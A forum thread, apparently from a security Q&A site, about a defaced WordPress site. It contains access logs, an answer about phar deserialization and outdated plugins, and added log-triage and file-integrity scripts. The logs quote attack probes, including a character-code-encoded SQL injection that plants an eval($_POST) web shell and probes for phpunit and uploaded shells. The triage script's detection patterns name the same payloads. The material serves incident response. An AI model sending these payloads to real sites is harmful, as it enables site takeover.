
I woke up today to see the top and bottom pages of my website displaying a link with text "Cheap Jerseys Free Shipping".

I quickly went in and saw that /index.php and /wp-content/themes/Avada/footer.php were changed; I removed the links and saved the files back.

I want to know how the person got access to both files so I can fix it. I have looked everywhere I can; can anyone please let me know where else to look?

This is how my index.php looked before I fixed it:

<a href="http://www.example.com">Cheap Jerseys Free Shipping</a>
<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define('WP_USE_THEMES', true);

/** Loads the WordPress Environment and Template */
require( dirname( __FILE__ ) . '/wp-blog-header.php' );

I have secured my WordPress site following the WordPress hardening guide. The site is hosted on Amazon Lightsail.

  1. Two users have access via SSH: me, with sudo, and VaultPress, which has limited access to the /web directory. SSH access is linked to an instant email notification; as soon as anyone accesses the server via SSH an email is sent with the IP. The access logs show no SSH access was granted.
  2. Two FTP users that have read-only access limited to the /web/downloads/ and /web/update directories only.
  3. Only 1 user on WordPress, password now changed. /wp-admin has the following, plus password authentication where the password file is in a .directory:
     Order allow,deny
     Allow from all
     Satisfy any
     AuthType Basic
     AuthName "Admins Only"
     AuthUserFile "/var/www/.xxx/xxxx/xxxxxx-xx-xxx"
     require valid-user
     wp-config.php in the / directory has:
     order allow,deny
     deny from all
  4. All access is blocked by the firewall except SSH (22), 80 and 443. Database access is limited to local only.
  5. Google Tag Manager was not changed and only includes links to Analytics, AdWords, and specific click analytics.
  5. Google Tag manager was not changed and only includes links to Analytics, Adwords, and specific click analytics.

Apache web access log entries that looked suspicious are below; I do not know what they mean, though. VaultPress backups show that the change happened between Aug 28 (2:38 AM) and Aug 29 (2:38 AM).

27.24.xx.xxx - - [27/Aug/2018:11:20:17 +0000] "GET /plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=97&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=114&arrs2[]=101&arrs2[]=97&arrs2[]=100&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=120&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=101&arrs2[]=99&arrs2[]=104&arrs2[]=111&arrs2[]=32&arrs2[]=109&arrs2[]=79&arrs2[]=111&arrs2[]=110&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=32&arrs2[]=87&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=57&arrs2[]=32&arrs2[]=35 HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:20:23 +0000] "GET /plus/ad_js.php?aid=19 HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:20:31 +0000] "GET /include/dialog/select_soft_post.php HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:20:33 +0000] "GET /data/cache/asd.php HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:20:39 +0000] "GET /install/index.php.bak?step=11&insLockfile=a&s_lang=x&install_demo_name=../data/admin/config_update.php HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:20:41 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 94621
95.108.xxx.xx - - [27/Aug/2018:11:20:41 +0000] "GET /blog/xxx-xxx-xxxx-saves-lives/ HTTP/1.1" 200 103653
141.8.142.161 - - [27/Aug/2018:11:20:44 +0000] "GET /wp-content/themes/Avada/includes/lib/assets/fonts/fontawesome/webfonts/fa-solid-900.woff2 HTTP/1.1" 200 65580
95.108.xxx.xx - - [27/Aug/2018:11:20:44 +0000] "GET /blog/xxx-xxx-xxxx-saves-lives/?relatedposts=1 HTTP/1.1" 200 1426
27.24.21.214 - - [27/Aug/2018:11:20:44 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/asd.php HTTP/1.1" 404 94621
66.249.xxx.xx - - [27/Aug/2018:11:20:48 +0000] "GET /blog/xxx-xxx-xxxx-tool/ HTTP/1.1" 200 105062
27.24.xx.xxx - - [27/Aug/2018:11:20:51 +0000] "GET /index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1" 301 5880
27.24.xx.xxx - - [27/Aug/2018:11:20:53 +0000] "GET /?m=member&c=index&a=register&siteid=1 HTTP/1.1" 200 95434
27.24.xx.xxx - - [27/Aug/2018:11:20:57 +0000] "GET /search.php HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:21:01 +0000] "GET / HTTP/1.1" 200 103770
27.24.xx.xxx - - [27/Aug/2018:11:21:07 +0000] "GET /index.php?s=/Core/File/uploadPictureBase64.html HTTP/1.1" 200 97157
27.24.xx.xxx - - [27/Aug/2018:11:21:26 +0000] "GET /install.php?finish=1 HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:21:29 +0000] "GET /da.php HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:21:36 +0000] "GET /dayrui/libraries/Chart/ofc_upload_image.php?name=shell9257.php HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:21:43 +0000] "GET /dayrui/libraries/tmp-upload-images/shell9257.php HTTP/1.1" 404 94621

128.77.xxx.xxx - - [29/Aug/2018:10:31:25 +0000] "GET /index.php?cperpage=1 HTTP/1.1" 301 510
128.77.xxx.xxx - - [29/Aug/2018:10:31:27 +0000] "GET /?cperpage=1 HTTP/1.1" 200 98345
128.77.xxx.xxx - - [29/Aug/2018:10:31:33 +0000] "GET /index.php?cperpage=1 HTTP/1.1" 301 510
128.77.xxx.xxx - - [29/Aug/2018:10:31:35 +0000] "GET /?cperpage=1 HTTP/1.1" 200 98330
128.77.xxx.xxx - - [29/Aug/2018:10:31:40 +0000] "GET /wp-admin HTTP/1.1" 401 735
80.122.xx.xx - - [29/Aug/2018:10:31:42 +0000] "GET / HTTP/1.1" 200 103865
66.249.xx.xxx - - [29/Aug/2018:10:31:49 +0000] "GET /robots.txt HTTP/1.1" 200 6059
80.122.xx.xxx - - [29/Aug/2018:10:31:49 +0000] "GET /index.php?cperpage=1 HTTP/1.1" 301 510
66.249.xx.xxx - - [29/Aug/2018:10:31:50 +0000] "GET /blog/author/scott-baird/ HTTP/1.1" 301 553
80.122.xx.xx - - [29/Aug/2018:10:31:51 +0000] "GET /?cperpage=1 HTTP/1.1" 200 98482
80.122.xx.xx - - [29/Aug/2018:10:31:57 +0000] "GET /index.php?cperpage=1 HTTP/1.1" 301 510
80.122.xx.xx - - [29/Aug/2018:10:31:59 +0000] "GET /?cperpage=1 HTTP/1.1" 200 98478
80.122.xx.xx - - [29/Aug/2018:10:32:03 +0000] "GET /wp-admin HTTP/1.1" 401 735
95.105.xxx.xxx - - [29/Aug/2018:10:32:15 +0000] "GET / HTTP/1.1" 200 103705
95.105.xxx.xxx - - [29/Aug/2018:10:32:27 +0000] "GET /index.php?cperpage=1 HTTP/1.1" 301 5879
95.105.xxx.xxx - - [29/Aug/2018:10:32:27 +0000] "GET / HTTP/1.1" 200 103701
95.105.xxx.xxx - - [29/Aug/2018:10:32:30 +0000] "GET /?cperpage=1 HTTP/1.1" 200 98347
95.105.xxx.xxx - - [29/Aug/2018:10:32:35 +0000] "GET /index.php?cperpage=1 HTTP/1.1" 301 510
95.105.xxx.xxx - - [29/Aug/2018:10:32:37 +0000] "GET /?cperpage=1 HTTP/1.1" 200 98325
95.105.xxx.xxx - - [29/Aug/2018:10:32:41 +0000] "GET /index.php?cperpage=1 HTTP/1.1" 301 510
95.105.xxx.xxx - - [29/Aug/2018:10:32:43 +0000] "GET /index.php?cperpage=1 HTTP/1.1" 301 5879
192.0.xxx.xxx - - [29/Aug/2018:10:32:44 +0000] "HEAD / HTTP/1.1" 200 5846
95.105.xxx.xxx - - [29/Aug/2018:10:32:43 +0000] "GET /?cperpage=1 HTTP/1.1" 200 98332
95.105.xxx.xxx - - [29/Aug/2018:10:32:49 +0000] "GET /wp-admin HTTP/1.1" 401 735
95.105.xxx.xxx - - [29/Aug/2018:10:32:45 +0000] "GET /?cperpage=1 HTTP/1.1" 200 98325
95.105.xxx.xxx - - [29/Aug/2018:10:32:51 +0000] "GET /wp-admin HTTP/1.1" 401 735
77.72.xxx.xxx - - [29/Aug/2018:10:33:12 +0000] "POST /wp-login.php HTTP/1.1" 200 10257
60.191.xxx.xxx - - [29/Aug/2018:10:33:17 +0000] "GET / HTTP/1.1" 200 84011/wp-admin/tools.php?page=string-locator&edit-file=index.php&file-reference=&file-type=core&string-locator-line=1&string-locator-path=%2Fvar%2Fwww%2Fmy-site%2Findex.php HTTP/1.1" 200 19947
119.my.ip - me@my-site.com [29/Aug/2018:14:38:17 +0000] "GET /wp-admin/load-styles.php?c=0&dir=ltr&load%5B%5D=dashicons,admin-bar,common,forms,admin-menu,dashboard,list-tables,edit,revisions,media,themes,about,nav-menus,wp-pointer,widgets&load%5B%5D=,site-icon,l10n,buttons,wp-auth-check,wp-jquery-ui-dialog,wp-color-picker,code-editor&ver=4.9.8 HTTP/1.1" 200 86794
119.my.ip - - [29/Aug/2018:14:38:17 +0000] "GET /wp-content/plugins/string-locator//resources/js/string-locator.js?ver=2.3.1 HTTP/1.1" 200 1119
119.my.ip - me@my-site.com [29/Aug/2018:14:38:17 +0000] "GET /wp-admin/load-scripts.php?c=0&load%5B%5D=jquery-core,jquery-migrate,utils,jquery-ui-core,jquery-ui-widget,jquery-ui-mouse,jquery-ui-sortable,underscore,wp-codemirror&ver=4.9.8 HTTP/1.1" 200 238028
119.my.ip - - [29/Aug/2018:14:38:20 +0000] "GET /wp-json/jetpack/v4/jitm?message_path=wp%3Atools_page_string-locator%3Aadmin_notices&query=page%253Dstring-locator%252Cedit-file%253Dindex.php%252Cfile-reference%253D%252Cfile-type%253Dcore%252Cstring-locator-line%253D1%252Cstring-locator-path%253D%25252Fvar%25252Fwww%25252Fmy-site%25252Findex.php&_wpnonce=e419c5f949 HTTP/1.1" 200 819
119.my.ip - me@my-site.com [29/Aug/2018:14:37:55 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 880
161.249.xxx.xx - - [29/Aug/2018:14:38:51 +0000] "-" 408 152
119.my.ip - me@my-site.com [29/Aug/2018:14:39:20 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 795
119.my.ip - me@my-site.com [29/Aug/2018:15:07:02 +0000] "GET /wp-admin/index.php HTTP/1.1" 200 25953

My WordPress site info

Avada Versions: 

### Avada Versions ###

Current Version: 5.6.2
Previous Version: 5.5.2  5.6.0  5.6.1

### WordPress Environment ###

Home URL: https://www.my-site.com
Site URL: https://www.my-site.com
WP Content Path: /var/www/my-site/wp-content
WP Path: /var/www/my-site/
WP Version: 4.9.8
WP Multisite: –
PHP Memory Limit: 512 MB
WP Debug Mode: –
Language: en_US

### Server Environment ###

Server Info: Apache/2.4.18 (Ubuntu)
PHP Version: 7.0.30-0ubuntu0.16.04.1. WordPress recommendation: 7.2 or above. See WordPress Requirements for details.
PHP Post Max Size: 32 MB
PHP Time Limit: 0
PHP Max Input Vars: 3000

MySQL Version: 5.7.23
Max Upload Size: 20 MB
DOMDocument: ✔
WP Remote Get: ✔
WP Remote Post: ✔
GD Library: 2.1.1

### Active Plugins (11) ###

VaultPress: by Automattic
LayerSlider WP: by Kreatura Media
Akismet Anti-Spam: by Automattic
Contact Form 7 - ZOHO CRM: by Obtain Code
Contact Form 7: by Takayuki Miyoshi
Fusion Builder: by ThemeFusion
Fusion Core: by ThemeFusion
Jetpack by WordPress.com: by Automattic
Slider Revolution: by ThemePunch
Yoast SEO Premium: by Team Yoast
WP Mail SMTP: by WPForms
schroeder
Waqas Tariq
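The question asks what the logged requests mean. The script below is an added example, not part of the original post: a small triage pass over Apache access-log lines that tags the patterns visible above, namely probes for files that belong to other CMSes or dev tooling (the /plus/, /dayrui/, /vendor/phpunit/ requests), 404s for PHP files, query strings that smuggle PHP source as arrays of character codes (the arrs1[]/arrs2[] request), requests for files named like web shells, POSTs to wp-login.php, and authenticated use of the String Locator plugin's file editor. The sample log lines and IP addresses are constructed for the example and only modelled on the question's entries; the tag names and path list are this example's own choices.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, unquote

# Apache combined/common log prefix: ip ident user [time] "request" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Paths a WordPress site never serves, but which the question's log shows being
# probed: other CMSes' files, dev tooling, generic upload/backdoor locations.
SCANNER_PATHS = (
    "/plus/", "/include/dialog/", "/data/cache/", "/install/index.php.bak",
    "/vendor/phpunit/", "/dayrui/", "/install.php", "uploadPictureBase64",
)

# Constructed sample lines modelled on the question's log (IPs are made up).
SAMPLE_LOG = """\
27.24.0.1 - - [27/Aug/2018:11:20:17 +0000] "GET /plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40 HTTP/1.1" 404 94621
27.24.0.1 - - [27/Aug/2018:11:20:41 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 94621
27.24.0.1 - - [27/Aug/2018:11:21:43 +0000] "GET /dayrui/libraries/tmp-upload-images/shell9257.php HTTP/1.1" 404 94621
95.108.0.2 - - [27/Aug/2018:11:20:41 +0000] "GET /blog/some-post/ HTTP/1.1" 200 103653
77.72.0.3 - - [29/Aug/2018:10:33:12 +0000] "POST /wp-login.php HTTP/1.1" 200 10257
198.51.100.9 - admin [29/Aug/2018:14:38:17 +0000] "GET /wp-admin/tools.php?page=string-locator&edit-file=index.php&file-type=core&string-locator-path=%2Fvar%2Fwww%2Fmy-site%2Findex.php HTTP/1.1" 200 19947
"""


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = rec["request"].split(" ")
    rec["method"] = parts[0] if parts else ""
    rec["url"] = parts[1] if len(parts) > 1 else ""
    return rec


def decode_char_array(query):
    """Rebuild text from repeated numeric array parameters (arrs2[]=60&arrs2[]=63...).

    Each value is taken as a character code. Returns {param_name: decoded_text}
    and is used only to inspect what a probe carried, never to execute it."""
    arrays = defaultdict(list)
    for key, val in parse_qsl(query, keep_blank_values=True):
        if key.endswith("[]") and val.isdigit() and int(val) < 256:
            arrays[key[:-2]].append(chr(int(val)))
    return {k: "".join(v) for k, v in arrays.items()}


def classify(rec):
    """Return the triage tags that apply to one parsed record."""
    tags = []
    url = rec["url"]
    path, query = (url.split("?", 1) + [""])[:2]
    if any(p in path for p in SCANNER_PATHS):
        tags.append("scanner-path")
    if rec["status"] == "404" and path.endswith(".php"):
        tags.append("404-php")
    blob = " ".join(decode_char_array(query).values()).lower()
    if "<?php" in blob or "eval(" in blob or "file_put_contents" in blob:
        tags.append("encoded-php-payload")
    if "shell" in path.lower() and path.endswith(".php"):
        tags.append("webshell-name")
    if rec["method"] == "POST" and path == "/wp-login.php":
        tags.append("login-attempt")
    decoded_url = unquote(url)
    if "string-locator" in decoded_url and "edit-file=" in decoded_url:
        tags.append("admin-file-edit")
    return tags


def triage(lines):
    """Group tagged requests per client IP: {ip: {tag: count}}."""
    report = defaultdict(lambda: defaultdict(int))
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for tag in classify(rec):
            report[rec["ip"]][tag] += 1
    return {ip: dict(tags) for ip, tags in report.items()}


if __name__ == "__main__":
    for ip, tags in sorted(triage(SAMPLE_LOG.splitlines()).items()):
        print(ip, tags)
```

To run it over a real log, pass the file object (`triage(open("/var/log/apache2/access.log"))`) instead of the sample. Read the result with the response codes in mind: a 404 on a probed path only shows that a scanner visited, which happens to every public site; the entries worth pulling on are probes that returned 200, POSTs to wp-login.php or admin-ajax.php from addresses that are not yours, and any authenticated file-editing request (the admin-file-edit tag) at a time you were not logged in.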

1 Answer


Your site was probably attacked using the latest PHP vulnerability, File Operation Induced Unserialization via the phar:// Stream Wrapper. In short, it's possible to upload a valid Phar archive to the server and trigger a file operation on that file.

If this wasn't the route used, check whether any of your plugins are outdated; they are the primary suspects in every WordPress compromise. You can install WPScan on your computer and run it against your blog. If any plugin is not updated, WPScan will show you.

ThoriumBR
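The answer's two candidate routes (a dropped Phar archive, an outdated plugin) and the asker's "where else to look" both come down to knowing exactly which files under the web root changed and when. The script below is an added example, not code from the answer or from WordPress: it builds a SHA-256 manifest of a tree, and later diffs a fresh manifest against that baseline to list modified, added and removed files, which would have pointed at footer.php, index.php and anything new under a plugin or theme directory before the defacement was noticed. The demo tree, file contents and the name dropped.php are constructed for the example; the directories skipped by default (cache, uploads) are this example's choice and should be tuned to the site.

```python
import hashlib
import json
import os
import tempfile
from pathlib import Path

HASH_CHUNK = 1 << 16


def sha256_file(path):
    """Stream a file through SHA-256 so large uploads do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(HASH_CHUNK), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root, skip_dirs=("cache", "uploads")):
    """Map every file under root (relative POSIX path) to its hash and mtime.

    skip_dirs holds directory names expected to churn; anything that can hold
    PHP (themes, plugins, core) must stay in scope."""
    root = Path(root)
    manifest = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d not in skip_dirs]
        for name in filenames:
            p = Path(dirpath) / name
            rel = p.relative_to(root).as_posix()
            manifest[rel] = {"sha256": sha256_file(p), "mtime": int(p.stat().st_mtime)}
    return manifest


def save_manifest(manifest, out_file):
    with open(out_file, "w") as f:
        json.dump(manifest, f, indent=1, sort_keys=True)


def load_manifest(in_file):
    with open(in_file) as f:
        return json.load(f)


def diff_manifests(baseline, current):
    """Return {'modified': [...], 'added': [...], 'removed': [...]} by content hash."""
    modified = sorted(p for p in baseline
                      if p in current and baseline[p]["sha256"] != current[p]["sha256"])
    added = sorted(p for p in current if p not in baseline)
    removed = sorted(p for p in baseline if p not in current)
    return {"modified": modified, "added": added, "removed": removed}


def demo():
    """Constructed demo: a fake WordPress tree, a baseline, then tampering like the question's."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "wp-content/themes/Avada").mkdir(parents=True)
        (root / "wp-content/uploads").mkdir(parents=True)
        index = root / "index.php"
        footer = root / "wp-content/themes/Avada/footer.php"
        index.write_text("<?php\ndefine('WP_USE_THEMES', true);\n"
                         "require( dirname( __FILE__ ) . '/wp-blog-header.php' );\n")
        footer.write_text("<?php wp_footer(); ?>\n")
        (root / "wp-content/uploads/photo.jpg").write_bytes(b"\xff\xd8\xff")

        baseline = build_manifest(root)

        # Tamper the way the question describes: a link prepended to index.php,
        # footer.php altered, plus one new PHP file dropped into the theme.
        index.write_text('<a href="http://www.example.com">Cheap Jerseys Free Shipping</a>\n'
                         + index.read_text())
        footer.write_text("<?php wp_footer(); ?>\n<!-- changed -->\n")
        (root / "wp-content/themes/Avada/dropped.php").write_text(
            "<?php // constructed placeholder file for the demo ?>\n")

        return diff_manifests(baseline, build_manifest(root))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

In practice, take the baseline right after a clean install or a verified restore, store the JSON somewhere the web server's user cannot write (an attacker who can edit index.php can edit a manifest that sits next to it), and rerun the diff from cron or after every backup. Compare by hash, not mtime: a file's timestamp is trivially set back, while its hash is not. The hashes for WordPress core and for plugins also let you compare against a pristine copy of the same version, which is what WPScan's version check is pointing you towards.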